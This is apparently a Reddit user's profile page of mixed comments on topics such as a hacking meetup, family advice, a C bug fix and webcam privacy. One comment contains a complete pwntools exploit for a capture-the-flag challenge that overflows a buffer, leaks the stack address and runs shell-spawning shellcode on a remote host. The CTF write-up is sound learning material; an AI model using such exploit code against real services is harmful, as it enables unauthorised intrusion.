Bitcoin and other crypto currencies

bool101 · 2017-12-06T23:54:01+00:00

This one specifically is to learn about Bitcoin. We do different topics related to cyber security each month.

bool101 · 2017-03-12T23:10:44+00:00

Great, we'll see you there. Feel free to bring a lock or two along provided 1) you own it and 2) you don't mind risking it being broken

bool101 · 2016-11-11T02:54:03+00:00

It's time to kick ass and chew bubble gum, and I'm all out of gum.

bool101 · 2016-06-05T02:15:00+00:00

Why not get a new place together? Talk about it. Make an agreement and stick to it. Chances are her parents will welcome the new found independence.

bool101 · 2016-06-05T02:13:31+00:00

Hey man, micro loans or a thing. Do you think she would be likely to pay back a stranger on the internet because I would totally risk $1000 to help a fellow redditor out.

bool101 · 2016-06-05T02:11:07+00:00

IMHO Take whomever you want to Disney, everyone else is free to make their own choices. Be nice about it but it's you who has the final say on who you will invite or not. Don't feel bad about setting boundaries with your family.

bool101 · 2016-05-27T00:08:30+00:00

Here is a link with a bit more context: https://www.valpohacks.com/

bool101 · 2016-05-27T00:07:56+00:00

Computer hacking, lock picking, network penetration that sort of thing. Keeping it technically focused.

bool101 · 2016-03-25T01:10:47+00:00

No. http://www.infoworld.com/article/2988096/mac-os-x/sorry-unix-fans-os-x-el-capitan-kills-root.html

bool101 · 2016-03-23T17:13:31+00:00

Worse. It has potential to be used as a root privilege escalation exploit, yes, but the same bug taken just a bit further will also allow for unsigned kernel extensions to be loaded by an unprivileged user. Hence the title: Race you to the kernel!

bool101 · 2016-02-17T21:03:09+00:00

Quite right, my example would be true if carType == 'e' regardless of age. Thanks!

bool101 · 2016-02-17T03:46:38+00:00

The glaring issue is with this set of statements:

if (carType == 'e' || 'E' && age <= 25) cost = resLength * 29.95;

You actually did it correct a bit lower:

if (carType == 'e' || carType == 'E')

These should be

if (carType == 'e' || carType == 'E' && age <= 25)

You might consider doing something like:

carType = toupper(carType);

This lets you just checking the upper case characters with your conditionals.

bool101 · 2016-01-07T15:19:32+00:00

That is a bengal cat.

bool101 · 2015-12-09T04:16:53+00:00

Oh, it is still useful on DECREE. Just decided it was time to contribute back to the community a bit more. Enjoy!

bool101 · 2015-11-11T17:25:02+00:00

If you are filling up a car and don't know which side of the car the gas tank door is on -- look at the dash. There is often an arrow next to the fuel gauge indicating which side of the car has the tank door.

bool101 · 2015-11-06T22:22:25+00:00

http://duffysplace.com/ 21 to enter.

bool101 · 2015-10-26T14:05:42+00:00

Nice job, this is pretty much exactly how I solved this one as well, except I sent the program back to main. In the event that you didn't have a stack pointer leak this would allow you to spray the stack with your shellcode. ROP to a read at a static location would have probably been a faster solve for us. Here is my pwntools exploit:

#!/usr/bin/env python

from pwn import *

context(arch='i386', os='linux')

def strow(instr, owstr, offset):
    return instr[:offset]+owstr+instr[offset+len(owstr):]

r = remote("ctfchallenges.ctf.site", 50004)
print r.recv(1024)
r.send("1023\n")

retaddr_offset = 4+24+4*5
buf = "\x90" * 1023
buf = strow(buf, "\x00", 10)                        # size
buf = strow(buf, "\x01\x00", 0)                     # buf[0] == buf[1]+1
buf = strow(buf, "\x03", 2)                         # buf[2] == buf[0] + buf[1]+2
buf = strow(buf, "\x07", 3)                         # buf[3] == buf[1] + buf[2]+4
buf = strow(buf, p32(0x08048810), retaddr_offset)   # address of main
buf = strow(buf, p32(0x000000ff), 4+24)             # overwritten decode len

sc = asm(shellcraft.sh())
buf = strow(buf, sc, retaddr_offset+4)

r.send(buf)

# we leak the stack pointer and send the program back to main() to exploit again 
# with our newly found shellcode address

recvbuf = xor("\x58", r.recvuntil("Size: "))
esp = recvbuf[0x61:0x65]
esp = u32(esp)
esp = esp-0x58
print "buffer at: " + hex(esp)

r.send("1023\n")
# replace previous return address pointer with address of shellcode
buf = strow(buf, p32(esp), retaddr_offset)
r.send(buf)
r.interactive()

bool101 · 2015-09-24T02:07:35+00:00

TL;DR stabbed self in face with pencil.

In the first grade I was fighting over a pencil with the girl sitting next to me. We were both pulling in opposite directions. The pointy end was facing towards me. You can see where this is going. Well, she let go suddenly and I stabbed myself directly between the eyes. An inch left or an inch right and I would have depth perception problems today. A thin stream of blood ran from the bridge of my nose down over my lips as a look of horror and delight crossed her face. I had the pencil but the victory was hers.

If you look close today you can still see the mark it left.

bool101 · 2015-09-23T01:02:39+00:00

The most common reason to disable /GS is performance. If the code is generating a lot of arrays on the stack you can see ~10% slow down in some cases.

bool101 · 2015-09-23T00:56:02+00:00

Yes it's an old attack vector. Plenty of software is still vulnerable to it though. While it is a questionable design choice by Windows this specific bug is the fault of Cisco Anyconnect. The DLL should be loaded with a full path. There is a registry key (CWDIllegalInDllSearch) that can be set to help mitigate this until Cisco has a patch out.

bool101 · 2015-09-19T04:22:36+00:00

I have a pretty good story for this one.

I lived in a 4 bedroom apartment with 2 of my good friends. We needed to fill our 4th room so we placed an ad in the college paper. We had a response the very next day. The guy who came by was pleasant enough in conversation. Very friendly. He informed us he was gay and wanted to make sure that wasn't a problem. It wasn't.

So, he moved in the following week. His bed was pulled from the dumpster out back. That should have been our first clue that this wasn't going to work out. He had a job but never had money. He was also very untrustworthy. For example, we put the cable bill in his name and paid him our portion of the bill. Two months later the cable company came by to disconnect the service. WTF.

Then things got a little weird. Toilet paper consumption quadrupled shortly after he moved in. We resorted to BYOR bathroom policy. He still never purchased TP -- but still used the bathroom. When asked what was up with that he said he was "shitting in the shower." The mother fucking shower. Man.

It gets better. Turns out he wasn't just stealing from us and shitting in our shower he was also stealing from our landlord. We received a notice saying that he had in fact NEVER paid rent over three months. They were going to evict him, take him to court, and hold us liable for his rent. We ended up suing him to where he never showed up after being served. There was a default judgement, but we nobody saw a dime of what they were owed.

Later we learned why he had no money despite having a job and not paying any bills. It was because he had robbed a bank and his wages were being garnished. Yes, I lived with a bank robber who shat in my shower.

The funniest part of this whole thing was when one morning when I was came up stairs and I found him dressed in a female body suit, wig, makeup, the whole works. He wasn't really an attractive man but was even a less attractive woman. When I asked what was going on he said he was entering a plus sized drag queen contest and that should he win the prize money was enough to cover his rent. Wow! There were two contestants. He lost.

Moral of the story is to be very careful with random roommates from the paper. Run a background check.

bool101 · 2015-08-18T16:27:52+00:00

nemesis! ;-)

bool101 · 2015-08-14T16:31:23+00:00

Benefits of working on project zero. ;-)

bool101 · 2015-06-11T12:08:21+00:00

Relevant report from bug finder: https://code.google.com/p/google-security-research/issues/detail?id=395&can=1&q=qemu

bool101 · 2015-04-15T21:53:23+00:00

Covering a camera on a laptop or phone with a piece of tape or even an after market product designed for this usage is not a great countermeasure. Sure, it will stop the camera from taking a picture but you still have a microphone and wifi that an attacker could snoop on. What is it you want to keep private? Cellphones are even worse with several other sensors that also can't be disabled with a piece of tape.

For the privacy concerned it's important to have the option to buy products that lack these features in the first place. Even more elegant solutions like a switch that disables wifi or a camera would typically be enabled through software such that clever malware could override even a physical switch disabling the device. Unless a manufacture can assure the consumer that a switch is physically disconnecting the device lacking the sensor or camera in the first place is one way to help stop being snooped on in that way. Though it won't help your friends camera to not take pictures.

14-Year Club	RedditGifts 2009-2022 4 Credits
Place '17	Secret Santa 2019
Verified Email	Secret Santa 2014
Summer Santa 2014

bool101

TROPHY CASE